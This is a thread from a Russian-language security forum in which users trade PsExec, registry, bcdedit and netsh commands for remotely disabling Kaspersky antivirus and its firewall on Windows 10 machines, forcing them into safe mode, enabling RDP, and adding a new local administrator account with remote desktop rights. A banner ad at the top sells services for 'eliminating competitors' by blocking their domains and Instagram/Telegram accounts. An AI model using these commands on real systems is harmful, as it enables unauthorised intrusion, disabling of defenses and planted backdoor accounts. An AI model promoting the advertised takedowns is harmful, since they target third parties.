УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
PSEXEC Windows 10 Pro

Страница 2 из 2

Опции темы

Поиск в этой теме

Опции просмотра

#11

28.04.2019, 21:29

molemime

Guest

Сообщений: n/a

Провел на форуме:
13528

Репутация: 0

Цитата:

Сообщение от user100

user100 said:
↑
С пастбина я б так побывал:
net stop AVP19.0.0
net stop KSDE1.0.0

Не получается, ошибка доступа.

Теоретически один вариант остается:

.\PsExec64.exe \\10.0.40.229 -s 'c:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 19.0.0\avp.com' stop firewall

Но нужно установить пароль на касперского, так:

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Kaspersky Lab\AVP19.0.0\settings" /v "EnablePswrdProtect" /d "00000001" /f

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Kaspersky Lab\AVP19.0.0\settings\def" /v "EnablePswrdProtect" /d "00000001" /f

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Kaspersky Lab\KSDE1.0.0\settings" /v "EnablePswrdProtect" /d "00000001" /f

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Kaspersky Lab\KSDE1.0.0\settings\def" /v "EnablePswrdProtect" /d "00000001" /f

Но опять же... Ошибка доступа. Надо делать в безопасном режиме!

Отправляю машину в безопасный режим:

.\PsExec64.exe \\10.0.40.229 -s bcdedit /set safeboot network

.\PsExec64.exe \\10.0.40.229 -s shutdown /r

Вернулась, пингуется, но нет связи через PSTOOLS. Выходит, что касперский не такое уж и плохое решение. Но ресурсозатротность у него выше чем у тоже NOD.

Было решить попробовать другой хост, там нет антивируса но порты все равно закрыты.

Обе машины при этом в домене почему на них не распространяются политики домена по удаленному доступу - непонятно:

https://pastebin.com/v3atAFHp

И все равно вижу такое:

.SpoilerTarget" type="button">Spoiler: nmap
PS C:\Users\kpv\Downloads\nmap> .\nmap.exe --open -Pn 10.0.40.213

Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-28 22:17 RTZ 4 (ceia)

Nmap scan report for 10.0.40.213

Host is up (0.00062s latency).

Not shown: 997 closed ports

PORT STATE SERVICE

135/tcp open msrpc

139/tcp open netbios-ssn

445/tcp open microsoft-ds

MAC Address: 40:16:7E:0E:75A (Asustek Computer)

Nmap done: 1 IP address (1 host up) scanned in 3.00 seconds

PS C:\Users\kpv\Downloads\nmap>

UPDATE

Без антивируса RDP включается так:

psexec.exe \\ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contr ol\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

psexec.exe \\ netsh firewall set service RemoteDesktop enable

Причем даже перезагружать ничего не надо. Срабатывает сиюсекундно.

Завтра буду мучить защищенную машину, надо дождаться реакции пользователя на безопасный режим.

#12

29.04.2019, 01:23

moonden

Guest

Сообщений: n/a

Провел на форуме:
8076

Репутация: 0

А что мешает подключиться по RDP и вырубить каспера, либо же добавить в исключения нужный софт? Создай нового пользователя:

Код:

Code:
net user New_user PassW0rd /add
net localgroup Администраторы New_user /add
net localgroup "Пользователи удаленного рабочего стола" New_user /add

Так как это не серверная, пропатчи с помощью RDP Wrapper Library:

Код:

Code:
Rdpwinst -i -o

Раз уж это десятка, то может не патчиться(они постоянно обновления выпускают тогда ищи нужную версию rdpwrap.ini тут или в гоше, по запросу "rdpwrap.ini [номер винды] github.com".

И после установки обнови:

Код:

Code:
Rdpwinst -w

#13

30.04.2019, 02:52

Игорь

Новичок

Регистрация: 05.09.2006

Сообщений: 10

Провел на форуме:
8325

Репутация: 0

Цитата:

Сообщение от molemime

molemime said:
↑
с доступом к cmd с правами локального админа

Обязательно по локалке подключаться. TeamViewer возможно не заблокирует, т.к. там другой способ подключения. Или через планировщик возможно autoit скрипт запустить, он уже сделает остальное.